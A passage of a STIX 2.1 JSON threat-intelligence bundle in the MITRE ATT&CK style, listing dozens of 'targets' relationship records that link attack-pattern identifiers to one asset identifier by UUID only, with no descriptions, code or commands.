"created": "2024-07-01T10:37:15.832745", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832747", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--326a204e-8ed2-40b8-995f-f51c915dbb0a", "created": "2024-07-01T10:37:15.832755", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832757", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27679203-ecbd-4337-a627-8c06571a6703", "created": "2024-07-01T10:37:15.832765", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832767", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--55ddd326-875e-47a2-b4a3-090921ae5cda", "created": "2024-07-01T10:37:15.832774", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832777", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--82a1fd34-fbe1-425d-ad2c-5279d890e034", "created": "2024-07-01T10:37:15.832785", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832787", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ad5f4377-f81f-4c05-aa4e-7a0bd39587bf", "created": "2024-07-01T10:37:15.832795", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832797", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47b556e9-f18b-4b8a-861d-6384cb48549a", "created": "2024-07-01T10:37:15.832805", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832807", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba527eb6-18a8-4c71-b24d-a966d4a25b1c", "created": "2024-07-01T10:37:15.832815", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832817", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4e29caf9-3648-4a8d-afda-90dcca56fc02", "created": "2024-07-01T10:37:15.832825", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832827", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d4fc5b0-13fb-4a56-9ddb-e8bcd1c7e30c", "created": "2024-07-01T10:37:15.832835", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832837", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66963039-58fc-4fe5-a4eb-0431fee366ab", "created": "2024-07-01T10:37:15.832845", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832847", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3449a5ca-1fb5-4855-aa4f-7a3973ea0eb9", "created": "2024-07-01T10:37:15.832855", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832857", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d47a151-acfa-4132-a77f-3f13b3a0958f", "created": "2024-07-01T10:37:15.832865", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832868", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d60ee775-f62a-466e-b2a3-2574f547fc6f", "created": "2024-07-01T10:37:15.832875", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832878", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8107ee7b-0c33-461d-a101-c5ee767089c9", "created": "2024-07-01T10:37:15.832885", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832887", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6c21560-d26d-4408-9659-e38ed7987d00", "created": "2024-07-01T10:37:15.832895", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832898", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b66fbdf-974a-4a8c-9a68-67553a000e2b", "created": "2024-07-01T10:37:15.832905", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832907", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--071a5e0f-7208-4c4d-87e0-7d71a61af16d", "created": "2024-07-01T10:37:15.832916", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832918", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d55bbf1b-e0d1-47b3-b16c-ba86f82faa6d", "created": "2024-07-01T10:37:15.832926", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832928", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fad7bca1-2b33-4e27-8f4b-79e65ca470f7", "created": "2024-07-01T10:37:15.832936", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832938", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--692fa3e2-1eb2-45ed-890a-31d134d589cf", "created": "2024-07-01T10:37:15.832946", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832948", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d8c7818f-c27c-4d69-bb28-f91b4f90bb03", "created": "2024-07-01T10:37:15.832956", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832958", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6ee6a28-498e-4624-ba5d-5f1405657232", "created": "2024-07-01T10:37:15.832966", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832968", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5615bb18-4cff-4e8b-899d-52be70eb44ea", "created": "2024-07-01T10:37:15.832976", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832978", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d13d920-f413-4593-b0be-f478a653d0d9", "created": "2024-07-01T10:37:15.832986", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832988", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a278cce8-b3e5-45bc-944c-947712b0eb94", "created": "2024-07-01T10:37:15.832996", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832998", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb2fb93e-be34-4e60-bde8-f4d12e094831", "created": "2024-07-01T10:37:15.833006", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833008", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--537d2fee-73e8-4b36-8267-459ddae4cef9", "created": "2024-07-01T10:37:15.833016", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833018", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60958bce-fc8d-486a-8adb-f10cd49f0125", "created": "2024-07-01T10:37:15.833026", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833028", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--497433ae-df5e-47cb-9937-5329793e6e53", "created": "2024-07-01T10:37:15.833036", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833038", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27daf7ee-d002-425e-97b9-d70d7de8dd73", "created": "2024-07-01T10:37:15.833050", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833052", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--36c93ff3-ffdf-477d-ad71-df98cae4ee38", "created": "2024-07-01T10:37:15.833060", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833062", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d12a43a5-0084-4efa-9975-09d5ec7325b5", "created": "2024-07-01T10:37:15.833070", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833086", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c34e3300-4ed0-485a-bca6-f7410ee1dbec", "created": "2024-07-01T10:37:15.833094", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833096", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13ad7f8f-3e5b-445c-b7b2-3ecfd9f7463e", "created": "2024-07-01T10:37:15.833104", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833106", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2e9bc52-50f8-4362-89cb-3ed65642609f", "created": "2024-07-01T10:37:15.833114", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833116", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ecaa743a-3f3b-47ce-b8d3-dd03ee84fda7", "created": "2024-07-01T10:37:15.833123", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833125", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c28423f-dc29-4071-bf7a-8a058f66af4c", "created": "2024-07-01T10:37:15.833133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833135", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--148ed80d-dbb9-481d-927e-2e000511cde7", "created": "2024-07-01T10:37:15.833143", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833145", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2cad6145-f7eb-48cb-99a8-6113040bd999", "created": "2024-07-01T10:37:15.833153", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833155", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15227c78-9b5e-4f2d-982e-04c8c4a9e702", "created": "2024-07-01T10:37:15.833163", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833165", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7820a119-f9dd-4fbc-a05f-ace21509ccd3", "created": "2024-07-01T10:37:15.833172", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.833174", "description": "", "relationship_type": "targets", "source_ref": 